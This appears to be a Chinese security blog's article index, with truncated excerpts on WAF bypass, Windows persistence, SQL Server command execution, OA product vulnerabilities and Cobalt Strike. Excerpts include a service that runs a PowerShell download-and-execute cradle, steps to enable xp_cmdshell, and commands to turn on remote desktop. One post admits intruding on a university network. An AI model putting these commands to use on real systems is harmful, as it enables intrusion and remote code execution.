![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全
文章平均质量分 82
Azjj98
擅长渗透测试、红蓝对抗、内网渗透、代码审计、WAF对抗、热爱安全、专心研究安全,多次参加大型攻防演练。
展开
-
.net代码审计-有趣的上传
.net代码审计原创 2022-03-04 15:53:26 · 1183 阅读 · 1 评论 -
Druid未授权漏洞实战利用
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任0x00 前言最近一直想更一篇实战的文章,距离上篇文章已经过去5个月了,上个月本来是想更一个湾湾大学的内网实战的,但是奈何搞到一半被管理员发现了,所控的服务器全部下线了,也就没再弄下去,此文章是在某SRC的某个企业的渗透实战,干货不是很多,但是相信对你的实战思路绝对是有帮助的。0x01Druid未授权漏洞发现对于Druid未授权访问,直接用扫描工具就可.原创 2021-08-30 10:28:16 · 9963 阅读 · 0 评论 -
防守者的角度来看攻击
0x01前言之前一直没做过防守,也不是没做过,而是没有做过比较正式的防守,在客户的一次HW前的演习活动中,有幸被派去做了防守的工作,虽然感觉相对于攻击队来说是比较划水的,但是还是比较有收获的。能了解到在攻击者在攻击的时候,防守这边的视角。0x02 看似风平浪静,实质暗潮涌动 盯着一天的防护设备日志,不断刷新,偶尔会弹出几个国外的ip东打一枪,西打一枪,会听到旁边的人说这攻击队真菜,一直到白天防守工作结束,防守方收拾好电脑,攻击队的獠牙已经漏了出来,确实,这个我是深有体会的,我...原创 2021-03-22 15:27:44 · 413 阅读 · 0 评论 -
某大学多站联动获取webshell
0x00前言前面大体概括一下获取webshell的一个思路,此服务器存在三个系统,利用第一个系统获取到了老师以及学生的学号,其他的没有什么价值的信息,虽然存在文件上传,但是上传的文件目录不是在web目录底下的,后来通过连接了webshell也证实了这一点,利用收集到的老师以及学生信息,成功登录了第二个系统,第二个系统学生登录后处存在上传,但是没有路径,并且不能访问到上传的文件,老师登录可以下载到学生上传的文件,通过抓包可以枚举所有目录以及文件,后来通过枚举发现此处的上传点也不在网站根目录下,然后回到学生原创 2021-01-26 22:22:57 · 746 阅读 · 2 评论 -
Bypass WAF实战总结
0X00前言上个月刷了一波洞,然后这个月初远程支持了一个HW,在文件上传getshell的时候,碰到个各式各样的云waf,通过一个月的实战,总结了几个比较实用的技巧,文章总结的不全,只是基于我实战中用到的一些方法。0x01垃圾填充这是众所周知、而又难以解决的问题。如果HTTP请求POST 太大,检测所有的内容,WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面的几K字节、1M、或2M。对于攻击者而然,只需要在前面添加许多无用数据,把攻击payload放在最后即可绕过WAF检测。1原创 2021-01-09 17:07:53 · 2698 阅读 · 1 评论 -
马氏五连鞭EduSrc漏洞挖掘
0x00前言最近是大事没有,小事不断,被调遣到客户单位做HW蓝方,没啥意思,整天盯着防护设备等待告警,正好一王者大佬最近在挖EduSrc,让帮着搞一搞,在50星荣耀王者的诱惑下,我准备开启我的EduSrc之旅。0x01 年轻人不讲武德通过对某个大学的C段扫描,扫到了一个学生管理系统简单测试了一下,发现抓包验证码不刷新,而且会提示“用户名不存在”,这里就可以进行账号密码的爆破。很显然,我的百万大字典不配爆破,这网站不讲武德,放弃爆破。0x02 偷袭通过目录扫描,扫描到未原创 2020-12-07 21:04:36 · 4041 阅读 · 9 评论 -
红队人员实战手册
红队人员实战手册 声明本文转载于klionsec的github 感觉写的挺好,分享一下分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备才能把路越走越宽 二来, 也是为秉承共享协作, 希望能为 红队 及 部分实战攻防研究人员 做出自己应有的贡献 个人一直坚信, 真正的价值来源于实实在在的奉献,与其天天到处嘴炮,不如静下心来多反思下...转载 2020-11-30 22:46:05 · 1365 阅读 · 0 评论 -
Windows远控之权限维持
Windows权限维持一丶建立系统服务获得了管理员的权限可以选择建立系统服务来进行持久控制,会被杀软拦截。1、使用sc命令建立系统服务,可以选择执行上传的木马,或者powershell远程执行。sc create "nuoyan" binpath= "c:\accc.exe"sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http:/原创 2020-11-23 21:02:39 · 1225 阅读 · 0 评论 -
通过SQLserver执行系统命令
SQLserver执行命令方法一:xp_cmdshellexec master..xp_cmdshell "whoami"默认执行是关闭EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;将1修改为0则为关闭xp_cmdshell 被删除可采用xplog70.dll恢复Exec master.dbo.sp_addex...原创 2020-11-22 14:40:57 · 1680 阅读 · 0 评论 -
各行业漏洞测试项
互联网行业 通用业务模块 业务逻辑漏洞 登陆 暴力破解用户名密码 撞库 验证码爆破和绕过 手机号撞库 账户权限绕过 注册 恶意用户批量注册 恶意验证注册账户 存储型XSS 密码找回 重置任意用户账户密码 ...原创 2020-11-22 14:31:42 · 498 阅读 · 1 评论 -
通过CMD查询远程连接端口及开启远程连接端口的方法
一、CMD查询远程连接端口1.tasklist /svc | find "Ter"(查找远程连接的PID)2.netstat -ano | find "1352"(通过PID值查找开放的端口)二、开启远程连接端口win08,三条命令即可:wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconne原创 2020-11-22 14:25:52 · 6016 阅读 · 0 评论 -
Windows本地认证 NTLM Hash&LM Hash
自己一直对一些底层的原理欠缺,最近一段时间弥补了一些基础的东西,但是一直没做记录。Windows的一个登录验证是必须要了解的,这里简单做个笔记记录一下。Windows本地认证 NTLM Hash&LM Hash概括Windows本地认证采用sam hash比对的形式来判断用户密码是否正确,计算机本地用户的所有密码被加密存储在%SystemRoot%\system32\config\sam文件中,当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的密码进行比对,如果.原创 2020-11-21 01:33:26 · 1816 阅读 · 0 评论 -
漏洞挖掘之资产收集(信息收集)
漏洞挖掘之资产收集(信息收集)写在前忘了是在哪里看的一句话了,渗透测试的本质就是信息收集,确实,不管是渗透测试还是一些红蓝对抗中,都是一个信息收集的过程。之前也在跟一些面试的同志聊过关于信息收集的东西,千篇一律的回答就是那些东西,不管是在SRC众测还是攻防演练中,在拿到一个主站域名后,想从主站做入口进入到业务内网是很难的,或者说是不太现实的一件事,毕竟大多数的企业官网都是用的很成熟的框架,并且每天都会接受成千上万次的洗礼,能从主站拿到点东西第一是浪费事件,第二是难度太大,所以这里就体现出了信息收集原创 2020-11-18 15:41:07 · 4580 阅读 · 1 评论 -
记录一次企业官网被挂马的排查过程
事情发生在一个月前的晚上,因为领导下令了,客户网站被挂马,跳转bc页,影响比较大,刚打完王者农药的我默默的关闭了手机,开启了我的花呗分期的电脑。问题描述访问站点只要后面目录带Fkj(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转博彩网站,如果是电脑浏览器,就会弹空白页访问站点只要后面目录带Fkj(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转博彩网站,如果是电脑浏览器,就会弹空白页排查过程初步判断可能被修改js文件,但是翻...原创 2020-11-06 13:57:43 · 933 阅读 · 2 评论 -
weblogic未授权命令执行(CVE-2020-14882)
weblogic未授权命令执行(CVE-2020-14882)前言因为最近太忙了,各种文档之类的乱七八糟的事,对于刚爆的weblogic未授权,fofa上找了几个国外的站测了一下,正好今天没什么事,打算写个文章记录一下0x00 漏洞介绍未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。0x01影响版本 Oracle Weblogic Server 10.3.6.0.0 Ora...原创 2020-11-06 13:32:37 · 1104 阅读 · 0 评论 -
批量挖sql注入漏洞
这是去年我写的一篇文章,眼看着服务器马上到期了,也没有备份,直接复制过来了,也懒得改格式了,适合新手刷洞,将就看吧文章很水,但是很实在。关于批量挖sql注入,其实很简单,之前我在补天提交漏洞的时候,曾经在往常查阅了以下关于批量挖SQL注入的文章,其实没几个,无非就是告诉你用谷歌关键词之类的,但是搜索出来的站点挨个测试,太费时间和精力,效率太低这里我就讲一下怎么用最省力的方式批量刷sql注入的站点第一这里需要几个工具①7KBscan 爬虫机器人 (爬虫工具,种类很多,也可以自己写)②批量检测.原创 2020-10-08 19:55:04 · 3944 阅读 · 3 评论 -
漏洞挖掘-Google常用黑客语法
intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:情义.将返回所有在网页正文部分包含"情义"的网页.allintext:使用方法和intext类似.intitle:和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:情义.将返回所有网页标题中包含"情义"的网页.同理allintitle:也同intitle类似.cache:搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦原创 2020-11-13 12:44:51 · 1473 阅读 · 0 评论 -
PHP爆绝对路径方法
1、单引号爆路径说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。www.xxx.com/news.php?id=149′2、错误参数值爆路径说明:将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。www.xxx.com/researcharchive.php?id=-13、Google爆路径说明:结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点原创 2020-10-06 11:30:15 · 1070 阅读 · 0 评论 -
PhpStudy_pro小皮最新版本nginx 默认存在任意文件解析漏洞
0x00 前言先给小皮介绍下:phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。我记得我可爱的Taoing在前段时间给我说过这个洞,因为是小皮(phpstudy_pro)默认自带的测试版本,也就是nginx 1.15.11 ,所以说如果用小皮搭建的系统,不变化nginx版.原创 2020-10-06 11:21:31 · 598 阅读 · 0 评论 -
泛微OA云桥 未授权任意文件读取
0x00 漏洞描述泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。0x01 影响版本2018-2019 多个版本。0x02 漏洞复现第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串第原创 2020-10-06 11:19:37 · 1692 阅读 · 0 评论 -
用友GRP-u8 XXE 漏洞复现
0x00 漏洞描述用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。0x01 漏洞利用条件无需登录0x02 漏洞复现POC:POST /Proxy HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: localhostContent-Length:.原创 2020-10-06 11:18:47 · 1114 阅读 · 0 评论 -
通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述通达OA 11.5存在sql注入0x01 漏洞影响版本通达oa 11.50x02 漏洞复现1、下载通达OA 11.5https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe,点击安装2、创建一个普通账户test:test1234563.1、id参数存在sql注入利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入参数位置:/general/appbuilder/web/re..原创 2020-10-06 11:17:26 · 1094 阅读 · 1 评论 -
通达OA 11.7 后台sql注入getshell漏洞复现
0x00 漏洞描述通达OA 11.7存在sql注入0x01 漏洞影响版本通达oa 11.7利用条件:需要账号登录0x02 漏洞复现1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装2、condition_cascade参数存在布尔盲注POC:GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...原创 2020-10-06 11:15:45 · 643 阅读 · 0 评论 -
通达OA 任意文件上传+文件包含导致RCE
0x00 漏洞描述ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell0x01 漏洞影响版本通达OA V11版 <= 11.3 20200103 通达OA 2017版 <= 10.19 20190522 通达OA 2016版 <= 9.13 20170710 通达OA 2015版 <= 8.15 .原创 2020-10-06 11:14:48 · 2153 阅读 · 1 评论 -
通达OA 11.2后台getshell漏洞复现
0x00 漏洞描述通达OA 11.2“组织”-》”管理员”-》附件上传处存在任意文件上传漏洞,结合“系统管理”-》”附件管理”-》”添加存储目录”,修改附件上传后保存的路径,最终导致getshell0x01 漏洞影响版本通达OA 11.20x02 漏洞复现1、下载https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe,windows下直接点击安装,管理用户admin,密码为空2、使用admin,密码为空登录,点击”系统管理”-》..原创 2020-10-06 11:13:03 · 1119 阅读 · 1 评论 -
通达OA任意文件删除/未授权访问+任意文件上传漏洞复现
0x00 简介通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。今天看了好多通达OA的文章,根据护网中出现的一些0day,进行一波分析,其中感觉9hu大佬分析的很到位,然后来以此为基准,一起来看一下这个影响较深的漏洞。然后我自己感觉,出现的漏洞只是表面的一些,其中还有肯定是未公布的,包括我之前在别的版本审..原创 2020-10-06 11:10:55 · 2168 阅读 · 0 评论 -
深信服 EDR终端检测响应平台漏洞
0x01 前言深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。提示:以下是本篇文章正文内容,下面案例可供参考0x02 影响范围fofa关键字搜索:title=”终端检测响应平台”0x03 远...原创 2020-10-06 11:07:08 · 480 阅读 · 0 评论 -
Cobalt Strike下的快速横向扩展
C2下的横向移动本来打算今天早点睡的,奈何小区内的施工也不知道脑子怎么想的,凌晨大半夜的各种发动机嗡嗡响,实在是睡不着,想了下,写个文章来记录一下自己最近实战中的一些经验吧。1.前言 在红队人员拿到一台内网机器后,会进一步利用此权限进行内网的横向移动,从而进一步拿下内网更多的权限。本文只要是总结利用c2快速,简单有效的一个横向扩展。2.提权拿到一台内网服务器,如果权限不高的情况下,可能对我们后续的渗透比较局限,所以我们需要先提升到system权限在C2中有直接提权的exp,官方.原创 2020-09-12 02:26:06 · 3192 阅读 · 0 评论 -
CobaltStrike基础教程(一)
0x00 简介1. 什么是CobaltStrike?CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。在渗透人员实战过程中可以提供一些非常便捷的功能,也可以自己编写脚本实现自动化操作。2. CobaltStrike的文件结构│ Scripts 用户安装的插件│ agscript 拓展应用的脚本│原创 2020-08-10 00:43:33 · 1976 阅读 · 2 评论 -
挖洞奇遇
最近一直感觉很忙,但是也没做什么大事,白天就是整理一些文档之类的琐碎小事。晚上就是回家刷会剧,然后刷几个漏洞就到凌晨1 2点了其实这篇文章好久之前就像发的,本来想追求完美,但是就是最后一个环节,一直没彻底研究清楚,想了想,还是先发了吧。懒得排版了,反正也没几个人看。正文:最近几天想刷几个洞,在一个站扫目录的时候,扫到了一个shell.php的PHP文件,用连接工具连了一下,试了几个密码都不对。这网站肯定是有洞的。随便点开一个页面加了个点,报错了,有注入。先把后台密...原创 2020-07-19 01:05:31 · 1157 阅读 · 1 评论 -
BIG-IP ADC RCE漏洞(CVE-2020-5902)
BIG-IP ADC RCE漏洞(CVE-2020-5902)F5(F5 Networks)作为全球领先的应用交付网络(ADN)领域的厂商,6月被曝出BIG-IP(负载均衡)中两个严重漏洞,代号分别为CVE-2020-5902和CVE-2020-5903,就在上次HW期间,就见到过很多这个F5的设备,金融企业存在这种高危漏洞,想想都可怕。一丶漏洞简介 该漏洞是BIG-IP管理界面中称为“远程代码执行”漏洞,称为TMUI(流量管理用户界面)。未经身份验证的攻击者可以通过将恶意制作的HTTP请原创 2020-07-08 13:09:15 · 519 阅读 · 0 评论 -
一次弱口令渗透BC站
因为某种原因,接手了一个授权的bc站。内心是拒绝的,但是没办法,硬着头皮收下了。其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了但像我这种dd,只敢远观。打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针见到后台,废话不多说,直接弱口令套餐来一份得到的结果肯定是 密码错误X1 密码错误X2 密码错误X3…………算了,不浪费时间了,看一下探针~ 根据探针,得知网站的根目原创 2020-06-04 22:24:04 · 2860 阅读 · 6 评论 -
记录一次游戏私服getshell过程
记录一次游戏私服getshell过程晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。传统的游戏宣传页面,没啥东西试着一下输入了一下这套私服源码的后台目录,果真是一摸一样,跳到后台了~这套源码用的是aspcms,这版本后台有个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取参数没有使用自定义的filterPara函数过滤,导致sql注原创 2020-05-20 22:51:34 · 4270 阅读 · 4 评论 -
SRC漏洞挖掘之偏门资产收集篇
SRC漏洞挖掘之偏门资产收集篇写这篇文章的目得,就是跟大家分享一下平时我挖src漏洞的一些经验,当自己挖到某个站点的漏洞时,往往就会欣喜若狂的往src平台上提交,得到的结果却是 “漏洞已重复,感谢提交“ ,其实这结果很影响一个刚接触挖洞的人的积极性的。后来想想也是,你能搜索到的,别人也可以搜索到。所以经过一段时间的磨练,我总结了以下刷公益 src 漏洞中的偏门资产收集的办法,大大提高了漏洞的质量,以及节省很多收集资产的时间。一丶技术支持首先观察一下网站底部是否有技术支持:xxxx|网..原创 2020-05-11 20:15:45 · 2940 阅读 · 0 评论